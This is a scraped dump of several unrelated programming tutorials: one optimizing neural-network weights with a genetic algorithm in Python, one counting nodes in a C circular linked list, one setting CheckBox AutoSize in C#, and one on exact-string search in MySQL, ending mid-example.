null, "e": 4731, "s": 4262, "text": "def mat_to_vector(mat_pop_weights): pop_weights_vector = [] for sol_idx in range(mat_pop_weights.shape[0]): curr_vector = [] for layer_idx in range(mat_pop_weights.shape[1]): vector_weights = numpy.reshape(mat_pop_weights[sol_idx, layer_idx], newshape=(mat_pop_weights[sol_idx, layer_idx].size)) curr_vector.extend(vector_weights) pop_weights_vector.append(curr_vector) return numpy.array(pop_weights_vector)" }, { "code": null, "e": 5443, "s": 4731, "text": "The function accepts an argument representing the population of all solutions in order to loop through them and return their vector representation. At the beginning of the function, an empty list variable named pop_weights_vector is created to hold the result (vectors of all solutions). For each solution in matrix form, there is an inner loop that loops through its three matrices. For each matrix, it is converted into a vector using the numpy.reshape() function which accepts the input matrix and the output size to which the matrix will be reshaped. The variable curr_vector accepts all vectors for a single solution. After all vectors are generated, they get appended into the pop_weights_vector variable." }, { "code": null, "e": 6205, "s": 5443, "text": "Note that we used the numpy.extend() function for vectors belonging to the same solution and numpy.append() for vectors belonging to different solutions. The reason is that numpy.extend() takes the numbers within the 3 vectors belonging to the same solution and concatenate them together. In other words, calling this function for two lists returns a new single list with numbers from both lists. This is suitable in order to create just a 1D chromosome for each solution. But numpy.append() will return three lists for each solution. Calling it for two lists, it returns a new list which is split into two sub-lists. This is not our objective. Finally, the function mat_to_vector() returns the population solutions as a NumPy array for easy manipulation later." }, { "code": null, "e": 6499, "s": 6205, "text": "After converting all solutions from matrices to vectors and concatenated together, we are ready to go through the GA steps discussed in the tutorial titled “Introduction to Optimization with Genetic Algorithm”. The steps are presented in the main figure and also summarized in the next figure." }, { "code": null, "e": 6714, "s": 6499, "text": "Remember that GA uses a fitness function to returns a fitness value for each solution. The higher the fitness value the better the solution. The best solutions are returned as parents in the parents selection step." }, { "code": null, "e": 7033, "s": 6714, "text": "One of the common fitness functions for a classifier such as ANN is the accuracy. It is the ratio between the correctly classified samples and the total number of samples. It is calculated according to the next equation. The classification accuracy of each solution is calculated according to steps in the main figure." }, { "code": null, "e": 7253, "s": 7033, "text": "The single 1D vector of each solution is converted back into 3 matrices, one matrix for each layer (2 hidden and 1 output). Conversion takes place using a function called vector_to_mat(). It is defined in the next code." }, { "code": null, "e": 7850, "s": 7253, "text": "def vector_to_mat(vector_pop_weights, mat_pop_weights): mat_weights = [] for sol_idx in range(mat_pop_weights.shape[0]): start = 0 end = 0 for layer_idx in range(mat_pop_weights.shape[1]): end = end + mat_pop_weights[sol_idx, layer_idx].size curr_vector = vector_pop_weights[sol_idx, start:end] mat_layer_weights = numpy.reshape(curr_vector, newshape=(mat_pop_weights[sol_idx, layer_idx].shape)) mat_weights.append(mat_layer_weights) start = end return numpy.reshape(mat_weights, newshape=mat_pop_weights.shape)" }, { "code": null, "e": 8632, "s": 7850, "text": "It reverses the work done previously. But there is an important question. If the vector of a given solution is just one piece, how we can split into three different parts, each part represents a matrix? The size of the first parameters matrix between the input layer and the hidden layer is 102x150. When being converted into a vector, its length will be 15,300. Because it is the first vector to be inserted in the curr_vector variable according to the mat_to_vector() function, then its indices start from index 0 and end at index 15,299. The mat_pop_weights is used as an argument for the vector_to_mat() function in order to know the size of each matrix. We are not interested in using the weights from the mat_pop_weights variable but just the matrices sizes are used from it." }, { "code": null, "e": 9388, "s": 8632, "text": "For the second vector in the same solution, it will be the result of converting a matrix of size 150x60. Thus the vector length is 9,000. Such a vector is inserted into the curr_vector variable just before the previous vector of length 15,300. As a result, it will start from index 15,300 and ends at index 15,300+9,000–1=24,299. The -1 is used because Python starts indexing at 0. For the last vector created from the parameters matrix of size 60x4, its length is 240. Because it is added into the curr_vector variable exactly after the previous vector of length 9,000, then its index will start after it. That is its start index is 24,300 and its end index is 24,300+240–1=24,539. So, we can successfully restore the vector into the original 3 matrices." }, { "code": null, "e": 9642, "s": 9388, "text": "The matrices returned for each solution are used to predict the class label for each of the 1,962 samples in the used dataset to calculate the accuracy. This is done using 2 functions which are predict_outputs() and fitness() according to the next code." }, { "code": null, "e": 10725, "s": 9642, "text": "def predict_outputs(weights_mat, data_inputs, data_outputs, activation=\"relu\"): predictions = numpy.zeros(shape=(data_inputs.shape[0])) for sample_idx in range(data_inputs.shape[0]): r1 = data_inputs[sample_idx, :] for curr_weights in weights_mat: r1 = numpy.matmul(a=r1, b=curr_weights) if activation == \"relu\": r1 = relu(r1) elif activation == \"sigmoid\": r1 = sigmoid(r1) predicted_label = numpy.where(r1 == numpy.max(r1))[0][0] predictions[sample_idx] = predicted_label correct_predictions = numpy.where(predictions == data_outputs)[0].size accuracy = (correct_predictions/data_outputs.size)*100 return accuracy, predictionsdef fitness(weights_mat, data_inputs, data_outputs, activation=\"relu\"): accuracy = numpy.empty(shape=(weights_mat.shape[0])) for sol_idx in range(weights_mat.shape[0]): curr_sol_mat = weights_mat[sol_idx, :] accuracy[sol_idx], _ = predict_outputs(curr_sol_mat, data_inputs, data_outputs, activation=activation) return accuracy" }, { "code": null, "e": 11284, "s": 10725, "text": "The predict_outputs() function accepts the weights of a single solution, inputs, and outputs of the training data, and an optional parameter that specifies which activation function to use. It returns the accuracy of just one solution not all solutions within the population. It order to return the fitness value (i.e. accuracy) of all solutions within the population, the fitness() function loops through each solution, pass it to the predict_outputs() function, store the accuracy of all solutions into the accuracy array, and finally return such an array." }, { "code": null, "e": 11740, "s": 11284, "text": "After calculating the fitness value (i.e. accuracy) for all solutions, the remaining steps of GA in the main figure are applied the same way done previously. The best parents are selected, based on their accuracy, into the mating pool. Then mutation and crossover variants are applied in order to produce the offspring. The population of the new generation is created using both offspring and parents. These steps are repeated for a number of generations." }, { "code": null, "e": 11807, "s": 11740, "text": "The Python implementation for such project has three Python files:" }, { "code": null, "e": 11990, "s": 11807, "text": "ga.py for implementing GA functions.ANN.py for implementing ANN functions.Third file for calling such functions through a number of generations. This is the main file of the project." }, { "code": null, "e": 12027, "s": 11990, "text": "ga.py for implementing GA functions." }, { "code": null, "e": 12066, "s": 12027, "text": "ANN.py for implementing ANN functions." }, { "code": null, "e": 12175, "s": 12066, "text": "Third file for calling such functions through a number of generations. This is the main file of the project." }, { "code": null, "e": 12825, "s": 12175, "text": "The third file is the main file because it connects all functions. It reads the features and the class labels files, filters features based on the standard deviation, creates the ANN architecture, generates the initial solutions, loops through a number of generations by calculating the fitness values for all solutions, selecting best parents, applying crossover and mutation, and finally creating the new population. Its implementation is given below. Such a file defines the GA parameters such as a number of solutions per population, number of selected parents, mutation percent, and number of generations. You can try different values for them." }, { "code": null, "e": 16556, "s": 12825, "text": "import numpyimport GAimport pickleimport ANNimport matplotlib.pyplotf = open(\"dataset_features.pkl\", \"rb\")data_inputs2 = pickle.load(f)f.close()features_STDs = numpy.std(a=data_inputs2, axis=0)data_inputs = data_inputs2[:, features_STDs>50]f = open(\"outputs.pkl\", \"rb\")data_outputs = pickle.load(f)f.close()#Genetic algorithm parameters:# Mating Pool Size (Number of Parents)# Population Size# Number of Generations# Mutation Percentsol_per_pop = 8num_parents_mating = 4num_generations = 1000mutation_percent = 10#Creating the initial population.initial_pop_weights = []for curr_sol in numpy.arange(0, sol_per_pop): HL1_neurons = 150 input_HL1_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(data_inputs.shape[1], HL1_neurons)) HL2_neurons = 60 HL1_HL2_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(HL1_neurons, HL2_neurons)) output_neurons = 4 HL2_output_weights = numpy.random.uniform(low=-0.1, high=0.1, size=(HL2_neurons, output_neurons)) initial_pop_weights.append(numpy.array([input_HL1_weights, HL1_HL2_weights, HL2_output_weights]))pop_weights_mat = numpy.array(initial_pop_weights)pop_weights_vector = ga.mat_to_vector(pop_weights_mat)best_outputs = []accuracies = numpy.empty(shape=(num_generations))for generation in range(num_generations): print(\"Generation : \", generation) # converting the solutions from being vectors to matrices. pop_weights_mat = ga.vector_to_mat(pop_weights_vector, pop_weights_mat) # Measuring the fitness of each chromosome in the population. fitness = ANN.fitness(pop_weights_mat, data_inputs, data_outputs, activation=\"sigmoid\") accuracies[generation] = fitness[0] print(\"Fitness\") print(fitness) # Selecting the best parents in the population for mating. parents = ga.select_mating_pool(pop_weights_vector, fitness.copy(), num_parents_mating) print(\"Parents\") print(parents) # Generating next generation using crossover. offspring_crossover = ga.crossover(parents, offspring_size=(pop_weights_vector.shape[0]-parents.shape[0], pop_weights_vector.shape[1])) print(\"Crossover\") print(offspring_crossover) # Adding some variations to the offsrping using mutation. offspring_mutation = ga.mutation(offspring_crossover, mutation_percent=mutation_percent) print(\"Mutation\") print(offspring_mutation) # Creating the new population based on the parents and offspring. pop_weights_vector[0:parents.shape[0], :] = parents pop_weights_vector[parents.shape[0]:, :] = offspring_mutationpop_weights_mat = ga.vector_to_mat(pop_weights_vector, pop_weights_mat)best_weights = pop_weights_mat [0, :]acc, predictions = ANN.predict_outputs(best_weights, data_inputs, data_outputs, activation=\"sigmoid\")print(\"Accuracy of the best solution is : \", acc)matplotlib.pyplot.plot(accuracies, linewidth=5, color=\"black\")matplotlib.pyplot.xlabel(\"Iteration\", fontsize=20)matplotlib.pyplot.ylabel(\"Fitness\", fontsize=20)matplotlib.pyplot.xticks(numpy.arange(0, num_generations+1, 100), fontsize=15)matplotlib.pyplot.yticks(numpy.arange(0, 101, 5), fontsize=15)f = open(\"weights_\"+str(num_generations)+\"_iterations_\"+str(mutation_percent)+\"%_mutation.pkl\", \"wb\")pickle.dump(pop_weights_mat, f)f.close()" }, { "code": null, "e": 16757, "s": 16556, "text": "Based on 1,000 generations, a plot is created at the end of this file using Matplotlib visualization library that shows how the accuracy changes across each generation. It is shown in the next figure." }, { "code": null, "e": 17265, "s": 16757, "text": "After 1,000 iterations, the accuracy is more than 97%. This is compared to 45% without using an optimization technique as in the previous tutorial. This is an evidence about why results might be bad not because there is something wrong in the model or the data but because no optimization technique is used. Of course, using different values for the parameters such as 10,000 generations might increase the accuracy. At the end of this file, it saves the parameters in matrix form to the disk for use later." }, { "code": null, "e": 17564, "s": 17265, "text": "The ga.py file implementation is in listed below. Note that the mutation() function accepts the mutation_percent parameter that defines the number of genes to change their values randomly. It is set to 10% in the main file. Such a file holds the 2 new functions mat_to_vector() and vector_to_mat()." }, { "code": null, "e": 20669, "s": 17564, "text": "import numpyimport random# Converting each solution from matrix to vector.def mat_to_vector(mat_pop_weights): pop_weights_vector = [] for sol_idx in range(mat_pop_weights.shape[0]): curr_vector = [] for layer_idx in range(mat_pop_weights.shape[1]): vector_weights = numpy.reshape(mat_pop_weights[sol_idx, layer_idx], newshape=(mat_pop_weights[sol_idx, layer_idx].size)) curr_vector.extend(vector_weights) pop_weights_vector.append(curr_vector) return numpy.array(pop_weights_vector)# Converting each solution from vector to matrix.def vector_to_mat(vector_pop_weights, mat_pop_weights): mat_weights = [] for sol_idx in range(mat_pop_weights.shape[0]): start = 0 end = 0 for layer_idx in range(mat_pop_weights.shape[1]): end = end + mat_pop_weights[sol_idx, layer_idx].size curr_vector = vector_pop_weights[sol_idx, start:end] mat_layer_weights = numpy.reshape(curr_vector, newshape=(mat_pop_weights[sol_idx, layer_idx].shape)) mat_weights.append(mat_layer_weights) start = end return numpy.reshape(mat_weights, newshape=mat_pop_weights.shape)def select_mating_pool(pop, fitness, num_parents): # Selecting the best individuals in the current generation as parents for producing the offspring of the next generation. parents = numpy.empty((num_parents, pop.shape[1])) for parent_num in range(num_parents): max_fitness_idx = numpy.where(fitness == numpy.max(fitness)) max_fitness_idx = max_fitness_idx[0][0] parents[parent_num, :] = pop[max_fitness_idx, :] fitness[max_fitness_idx] = -99999999999 return parentsdef crossover(parents, offspring_size): offspring = numpy.empty(offspring_size) # The point at which crossover takes place between two parents. Usually, it is at the center. crossover_point = numpy.uint32(offspring_size[1]/2) for k in range(offspring_size[0]): # Index of the first parent to mate. parent1_idx = k%parents.shape[0] # Index of the second parent to mate. parent2_idx = (k+1)%parents.shape[0] # The new offspring will have its first half of its genes taken from the first parent. offspring[k, 0:crossover_point] = parents[parent1_idx, 0:crossover_point] # The new offspring will have its second half of its genes taken from the second parent. offspring[k, crossover_point:] = parents[parent2_idx, crossover_point:] return offspringdef mutation(offspring_crossover, mutation_percent): num_mutations = numpy.uint32((mutation_percent*offspring_crossover.shape[1])/100) mutation_indices = numpy.array(random.sample(range(0, offspring_crossover.shape[1]), num_mutations)) # Mutation changes a single gene in each offspring randomly. for idx in range(offspring_crossover.shape[0]): # The random value to be added to the gene. random_value = numpy.random.uniform(-1.0, 1.0, 1) offspring_crossover[idx, mutation_indices] = offspring_crossover[idx, mutation_indices] + random_value return offspring_crossover" }, { "code": null, "e": 20906, "s": 20669, "text": "Finally, the ANN.py is implemented according to the code listed below. It contains the implementation of the activation functions (sigmoid and ReLU) in addition to the fitness() and predict_outputs() functions to calculate the accuracy." }, { "code": null, "e": 22141, "s": 20906, "text": "import numpydef sigmoid(inpt): return 1.0 / (1.0 + numpy.exp(-1 * inpt))def relu(inpt): result = inpt result[inpt < 0] = 0 return resultdef predict_outputs(weights_mat, data_inputs, data_outputs, activation=\"relu\"): predictions = numpy.zeros(shape=(data_inputs.shape[0])) for sample_idx in range(data_inputs.shape[0]): r1 = data_inputs[sample_idx, :] for curr_weights in weights_mat: r1 = numpy.matmul(a=r1, b=curr_weights) if activation == \"relu\": r1 = relu(r1) elif activation == \"sigmoid\": r1 = sigmoid(r1) predicted_label = numpy.where(r1 == numpy.max(r1))[0][0] predictions[sample_idx] = predicted_label correct_predictions = numpy.where(predictions == data_outputs)[0].size accuracy = (correct_predictions / data_outputs.size) * 100 return accuracy, predictionsdef fitness(weights_mat, data_inputs, data_outputs, activation=\"relu\"): accuracy = numpy.empty(shape=(weights_mat.shape[0])) for sol_idx in range(weights_mat.shape[0]): curr_sol_mat = weights_mat[sol_idx, :] accuracy[sol_idx], _ = predict_outputs(curr_sol_mat, data_inputs, data_outputs, activation=activation) return accuracy" }, { "code": null, "e": 22193, "s": 22141, "text": "Introduction to Optimization with Genetic Algorithm" }, { "code": null, "e": 22279, "s": 22193, "text": "https://www.linkedin.com/pulse/introduction-optimization-genetic-algorithm-ahmed-gad/" }, { "code": null, "e": 22367, "s": 22279, "text": "https://www.kdnuggets.com/2018/03/introduction-optimization-with-genetic-algorithm.html" }, { "code": null, "e": 22463, "s": 22367, "text": "https://towardsdatascience.com/introduction-to-optimization-with-genetic-algorithm-2f5001d9964b" }, { "code": null, "e": 22510, "s": 22463, "text": "https://www.springer.com/us/book/9781484241660" }, { "code": null, "e": 22569, "s": 22510, "text": "Genetic Algorithm (GA) Optimization — Step-by-Step Example" }, { "code": null, "e": 22662, "s": 22569, "text": "https://www.slideshare.net/AhmedGadFCIT/genetic-algorithm-ga-optimization-stepbystep-example" } ]
Count nodes in Circular linked list in C++
We are given a circular linked list with the nodes and the task is to calculate the count of nodes present in a circular linked list. Circular Linked List is a variation of Linked list in which the first element points to the last element and the last element points to the first element. Both Singly Linked List and Doubly Linked List can be made into a circular linked list. In the below program, we are implementing a singly linked list as a circular linked list to calculate the count of nodes in that. Input − nodes-: 20, 1, 2, 3, 4, 5 Output − count of nodes are-: 6 Input − nodes-: 20, 1, 2, 3, 4, 5, 7, 8, 9, 12 Output − count of nodes are-: 10 Approach used in the below program is as follows − Create the structure for a singly linked list including the address and data held by the node. Create the structure for a singly linked list including the address and data held by the node. Create a push() function that will be used to insert the data into the node. Create a push() function that will be used to insert the data into the node. In the last node, store the address of the first node to make a singly linked list function as a circular linked list. In the last node, store the address of the first node to make a singly linked list function as a circular linked list. Create a count function that will count the total number of nodes present in a circular linked list. Create a count function that will count the total number of nodes present in a circular linked list. Live Demo #include <stdio.h> #include <stdlib.h> /* Defining a node */ struct node { int data; struct node* next; }; // Inserting node in Circular list void push(struct node** head_ref, int data){ struct node* ptr1 = (struct node*)malloc(sizeof(struct node)); struct node* temp = *head_ref; ptr1->data = data; ptr1->next = *head_ref; // going to the last node to insert new element. if (*head_ref != NULL){ while (temp->next != *head_ref){ temp = temp->next; } temp->next = ptr1; } else{ ptr1->next = ptr1; //for first node } *head_ref = ptr1; } // Function to count the number of nodes int count_fun(struct node* head){ struct node* temp = head; int result = 0; if (head != NULL){ do { temp = temp->next; result++; } while (temp != head); } return result; } int main(){ /* Initializing the list as empty */ struct node* head = NULL; push(&head, 10); push(&head, 20); push(&head, 30); push(&head, 40); printf("count of nodes are: %d", count_fun(head)); return 0; } If we run the above code it will generate the following output − count of nodes are: 4
[ { "code": null, "e": 1196, "s": 1062, "text": "We are given a circular linked list with the nodes and the task is to calculate the count of nodes present in a circular linked list." }, { "code": null, "e": 1439, "s": 1196, "text": "Circular Linked List is a variation of Linked list in which the first element points to the last element and the last element points to the first element. Both Singly Linked List and Doubly Linked List can be made into a circular linked list." }, { "code": null, "e": 1569, "s": 1439, "text": "In the below program, we are implementing a singly linked list as a circular linked list to calculate the count of nodes in that." }, { "code": null, "e": 1715, "s": 1569, "text": "Input − nodes-: 20, 1, 2, 3, 4, 5\nOutput − count of nodes are-: 6\nInput − nodes-: 20, 1, 2, 3, 4, 5, 7, 8, 9, 12\nOutput − count of nodes are-: 10" }, { "code": null, "e": 1766, "s": 1715, "text": "Approach used in the below program is as follows −" }, { "code": null, "e": 1861, "s": 1766, "text": "Create the structure for a singly linked list including the address and data held by the node." }, { "code": null, "e": 1956, "s": 1861, "text": "Create the structure for a singly linked list including the address and data held by the node." }, { "code": null, "e": 2033, "s": 1956, "text": "Create a push() function that will be used to insert the data into the node." }, { "code": null, "e": 2110, "s": 2033, "text": "Create a push() function that will be used to insert the data into the node." }, { "code": null, "e": 2229, "s": 2110, "text": "In the last node, store the address of the first node to make a singly linked list function as a circular linked list." }, { "code": null, "e": 2348, "s": 2229, "text": "In the last node, store the address of the first node to make a singly linked list function as a circular linked list." }, { "code": null, "e": 2449, "s": 2348, "text": "Create a count function that will count the total number of nodes present in a circular linked list." }, { "code": null, "e": 2550, "s": 2449, "text": "Create a count function that will count the total number of nodes present in a circular linked list." }, { "code": null, "e": 2561, "s": 2550, "text": " Live Demo" }, { "code": null, "e": 3651, "s": 2561, "text": "#include <stdio.h>\n#include <stdlib.h>\n/* Defining a node */\nstruct node {\n int data;\n struct node* next;\n};\n// Inserting node in Circular list\nvoid push(struct node** head_ref, int data){\n struct node* ptr1 = (struct node*)malloc(sizeof(struct node));\n struct node* temp = *head_ref;\n ptr1->data = data;\n ptr1->next = *head_ref;\n // going to the last node to insert new element.\n if (*head_ref != NULL){\n while (temp->next != *head_ref){\n temp = temp->next;\n }\n temp->next = ptr1;\n } else{\n ptr1->next = ptr1; //for first node\n }\n *head_ref = ptr1;\n}\n// Function to count the number of nodes\nint count_fun(struct node* head){\n struct node* temp = head;\n int result = 0;\n if (head != NULL){\n do {\n temp = temp->next;\n result++;\n } while (temp != head);\n }\n return result;\n}\nint main(){\n /* Initializing the list as empty */\n struct node* head = NULL;\n push(&head, 10);\n push(&head, 20);\n push(&head, 30);\n push(&head, 40);\n printf(\"count of nodes are: %d\", count_fun(head));\n return 0;\n}" }, { "code": null, "e": 3716, "s": 3651, "text": "If we run the above code it will generate the following output −" }, { "code": null, "e": 3738, "s": 3716, "text": "count of nodes are: 4" } ]
How to set the AutoSize of the CheckBox in C#? - GeeksforGeeks
22 Oct, 2021 The CheckBox control is the part of windows form which is used to take input from the user. Or in other words, CheckBox control allows us to select single or multiple elements from the given list. You are allowed to set the size of the CheckBox automatically using the AutoSize property of the CheckBox. The value of this property is of System.Boolean type means it takes true if you want to resize the CheckBox according to the content, otherwise, false. The default value of this property is true. In Windows form, you can set this property in two different ways:1. Design-Time: It is the simplest way to set the AutoSize property of a CheckBox using the following steps: Step 1: Create a windows form as shown in the below image: Visual Studio -> File -> New -> Project -> WindowsFormApp Step 2: Drag the CheckBox control from the ToolBox and drop it on the windows form. You can place CheckBox anywhere on the windows form according to your need. Step 3: After drag and drop you will go to the properties of the CheckBox control to set the value of the AutoSize property. Output: 2. Run-Time: It is a little bit trickier than the above method. In this method, you can set the AutoSize property of a CheckBox using the following syntax: public override bool AutoSize { get; set; } Following steps are used to set the AutoSize property of the CheckBox: Step 1: Create a checkbox using the CheckBox() constructor provided by the CheckBox class. // Creating checkbox CheckBox Mycheckbox = new CheckBox(); Step 2: After creating CheckBox, set the AutoSize property of the CheckBox provided by the CheckBox class. // Set the AutoSize property of the CheckBox Mycheckbox.AutoSize = true; Step 3 : And last add this checkbox control to form using Add() method. // Add this checkbox to form this.Controls.Add(Mycheckbox); Example: CSharp using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows.Forms; namespace WindowsFormsApp5 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { // Creating and setting the properties of label Label l = new Label(); l.Text = "Select City:"; l.AutoSize = true; l.Location = new Point(233, 111); l.Font = new Font("Bradley Hand ITC", 12); // Adding label to form this.Controls.Add(l); // Creating and setting the properties of CheckBox CheckBox Mycheckbox = new CheckBox(); Mycheckbox.Height = 50; Mycheckbox.Width = 100; Mycheckbox.Location = new Point(229, 136); Mycheckbox.Text = "Kolkata"; Mycheckbox.AutoSize = true; Mycheckbox.Font = new Font("Bradley Hand ITC", 12); // Adding checkbox to form this.Controls.Add(Mycheckbox); // Creating and setting the properties of CheckBox CheckBox Mycheckbox1 = new CheckBox(); Mycheckbox1.Height = 50; Mycheckbox1.Width = 100; Mycheckbox1.Location = new Point(230, 198); Mycheckbox1.Text = "Bhubaneswar"; Mycheckbox1.AutoSize = true; Mycheckbox1.Font = new Font("Bradley Hand ITC", 12); // Adding checkbox to form this.Controls.Add(Mycheckbox1); }}} Output: anikakapoor prachisoda1234 C# Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Extension Method in C# HashSet in C# with Examples Partial Classes in C# Top 50 C# Interview Questions & Answers C# | How to insert an element in an Array? C# | Inheritance C# | List Class Lambda Expressions in C# C# | .NET Framework (Basic Architecture and Component Stack) Linked List Implementation in C#
[ { "code": null, "e": 24222, "s": 24194, "text": "\n22 Oct, 2021" }, { "code": null, "e": 24897, "s": 24222, "text": "The CheckBox control is the part of windows form which is used to take input from the user. Or in other words, CheckBox control allows us to select single or multiple elements from the given list. You are allowed to set the size of the CheckBox automatically using the AutoSize property of the CheckBox. The value of this property is of System.Boolean type means it takes true if you want to resize the CheckBox according to the content, otherwise, false. The default value of this property is true. In Windows form, you can set this property in two different ways:1. Design-Time: It is the simplest way to set the AutoSize property of a CheckBox using the following steps: " }, { "code": null, "e": 25016, "s": 24897, "text": "Step 1: Create a windows form as shown in the below image: Visual Studio -> File -> New -> Project -> WindowsFormApp " }, { "code": null, "e": 25178, "s": 25016, "text": "Step 2: Drag the CheckBox control from the ToolBox and drop it on the windows form. You can place CheckBox anywhere on the windows form according to your need. " }, { "code": null, "e": 25305, "s": 25178, "text": "Step 3: After drag and drop you will go to the properties of the CheckBox control to set the value of the AutoSize property. " }, { "code": null, "e": 25315, "s": 25305, "text": "Output: " }, { "code": null, "e": 25472, "s": 25315, "text": "2. Run-Time: It is a little bit trickier than the above method. In this method, you can set the AutoSize property of a CheckBox using the following syntax: " }, { "code": null, "e": 25516, "s": 25472, "text": "public override bool AutoSize { get; set; }" }, { "code": null, "e": 25588, "s": 25516, "text": "Following steps are used to set the AutoSize property of the CheckBox: " }, { "code": null, "e": 25681, "s": 25588, "text": "Step 1: Create a checkbox using the CheckBox() constructor provided by the CheckBox class. " }, { "code": null, "e": 25740, "s": 25681, "text": "// Creating checkbox\nCheckBox Mycheckbox = new CheckBox();" }, { "code": null, "e": 25849, "s": 25740, "text": "Step 2: After creating CheckBox, set the AutoSize property of the CheckBox provided by the CheckBox class. " }, { "code": null, "e": 25922, "s": 25849, "text": "// Set the AutoSize property of the CheckBox\nMycheckbox.AutoSize = true;" }, { "code": null, "e": 25996, "s": 25922, "text": "Step 3 : And last add this checkbox control to form using Add() method. " }, { "code": null, "e": 26056, "s": 25996, "text": "// Add this checkbox to form\nthis.Controls.Add(Mycheckbox);" }, { "code": null, "e": 26065, "s": 26056, "text": "Example:" }, { "code": null, "e": 26072, "s": 26065, "text": "CSharp" }, { "code": "using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Linq;using System.Text;using System.Threading.Tasks;using System.Windows.Forms; namespace WindowsFormsApp5 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { // Creating and setting the properties of label Label l = new Label(); l.Text = \"Select City:\"; l.AutoSize = true; l.Location = new Point(233, 111); l.Font = new Font(\"Bradley Hand ITC\", 12); // Adding label to form this.Controls.Add(l); // Creating and setting the properties of CheckBox CheckBox Mycheckbox = new CheckBox(); Mycheckbox.Height = 50; Mycheckbox.Width = 100; Mycheckbox.Location = new Point(229, 136); Mycheckbox.Text = \"Kolkata\"; Mycheckbox.AutoSize = true; Mycheckbox.Font = new Font(\"Bradley Hand ITC\", 12); // Adding checkbox to form this.Controls.Add(Mycheckbox); // Creating and setting the properties of CheckBox CheckBox Mycheckbox1 = new CheckBox(); Mycheckbox1.Height = 50; Mycheckbox1.Width = 100; Mycheckbox1.Location = new Point(230, 198); Mycheckbox1.Text = \"Bhubaneswar\"; Mycheckbox1.AutoSize = true; Mycheckbox1.Font = new Font(\"Bradley Hand ITC\", 12); // Adding checkbox to form this.Controls.Add(Mycheckbox1); }}}", "e": 27615, "s": 26072, "text": null }, { "code": null, "e": 27623, "s": 27615, "text": "Output:" }, { "code": null, "e": 27635, "s": 27623, "text": "anikakapoor" }, { "code": null, "e": 27650, "s": 27635, "text": "prachisoda1234" }, { "code": null, "e": 27653, "s": 27650, "text": "C#" }, { "code": null, "e": 27751, "s": 27653, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27760, "s": 27751, "text": "Comments" }, { "code": null, "e": 27773, "s": 27760, "text": "Old Comments" }, { "code": null, "e": 27796, "s": 27773, "text": "Extension Method in C#" }, { "code": null, "e": 27824, "s": 27796, "text": "HashSet in C# with Examples" }, { "code": null, "e": 27846, "s": 27824, "text": "Partial Classes in C#" }, { "code": null, "e": 27886, "s": 27846, "text": "Top 50 C# Interview Questions & Answers" }, { "code": null, "e": 27929, "s": 27886, "text": "C# | How to insert an element in an Array?" }, { "code": null, "e": 27946, "s": 27929, "text": "C# | Inheritance" }, { "code": null, "e": 27962, "s": 27946, "text": "C# | List Class" }, { "code": null, "e": 27987, "s": 27962, "text": "Lambda Expressions in C#" }, { "code": null, "e": 28048, "s": 27987, "text": "C# | .NET Framework (Basic Architecture and Component Stack)" } ]
How to search for exact string in MySQL?
You can use binary to search for exact string in MySQL. The syntax is as follows: SELECT * FROM yourTableName WHERE BINARY yourColumnName = yourStringValue; To understand the above syntax, let us create a table. The query to create a table is as follows: mysql> create table ExactSearch -> ( -> Id int NOT NULL AUTO_INCREMENT, -> UserId varchar(10), -> UserName varchar(20), -> PRIMARY KEY(Id) -> ); Query OK, 0 rows affected (0.69 sec) Insert some records in the table using insert command. The query is as follows: mysql> insert into ExactSearch(UserId,UserName) values('USER12','John'); Query OK, 1 row affected (0.11 sec) mysql> insert into ExactSearch(UserId,UserName) values('12USER','Carol'); Query OK, 1 row affected (0.20 sec) mysql> insert into ExactSearch(UserId,UserName) values('USER123','Bob'); Query OK, 1 row affected (0.15 sec) mysql> insert into ExactSearch(UserId,UserName) values('USER231','Sam'); Query OK, 1 row affected (0.18 sec) Display all records from the table using select statement: mysql> select *from ExactSearch; The following is the output: +----+---------+----------+ | Id | UserId | UserName | +----+---------+----------+ | 1 | USER12 | John | | 2 | 12USER | Carol | | 3 | USER123 | Bob | | 4 | USER231 | Sam | +----+---------+----------+ 4 rows in set (0.00 sec) Here is the query to search for exact string in MySQL. We are searching for string “USER123”: mysql> select *from ExactSearch where binary UserId = 'USER123'; The following is the output: +----+---------+----------+ | Id | UserId | UserName | +----+---------+----------+ | 3 | USER123 | Bob | +----+---------+----------+ 1 row in set (0.00 sec)
[ { "code": null, "e": 1144, "s": 1062, "text": "You can use binary to search for exact string in MySQL. The syntax is as follows:" }, { "code": null, "e": 1219, "s": 1144, "text": "SELECT * FROM yourTableName WHERE BINARY yourColumnName = yourStringValue;" }, { "code": null, "e": 1317, "s": 1219, "text": "To understand the above syntax, let us create a table. The query to create a table is as follows:" }, { "code": null, "e": 1517, "s": 1317, "text": "mysql> create table ExactSearch\n -> (\n -> Id int NOT NULL AUTO_INCREMENT,\n -> UserId varchar(10),\n -> UserName varchar(20),\n -> PRIMARY KEY(Id)\n -> );\nQuery OK, 0 rows affected (0.69 sec)" }, { "code": null, "e": 1597, "s": 1517, "text": "Insert some records in the table using insert command. The query is as follows:" }, { "code": null, "e": 2037, "s": 1597, "text": "mysql> insert into ExactSearch(UserId,UserName) values('USER12','John');\nQuery OK, 1 row affected (0.11 sec)\n\nmysql> insert into ExactSearch(UserId,UserName) values('12USER','Carol');\nQuery OK, 1 row affected (0.20 sec)\n\nmysql> insert into ExactSearch(UserId,UserName) values('USER123','Bob');\nQuery OK, 1 row affected (0.15 sec)\n\nmysql> insert into ExactSearch(UserId,UserName) values('USER231','Sam');\nQuery OK, 1 row affected (0.18 sec)" }, { "code": null, "e": 2096, "s": 2037, "text": "Display all records from the table using select statement:" }, { "code": null, "e": 2129, "s": 2096, "text": "mysql> select *from ExactSearch;" }, { "code": null, "e": 2158, "s": 2129, "text": "The following is the output:" }, { "code": null, "e": 2407, "s": 2158, "text": "+----+---------+----------+\n| Id | UserId | UserName |\n+----+---------+----------+\n| 1 | USER12 | John |\n| 2 | 12USER | Carol |\n| 3 | USER123 | Bob |\n| 4 | USER231 | Sam 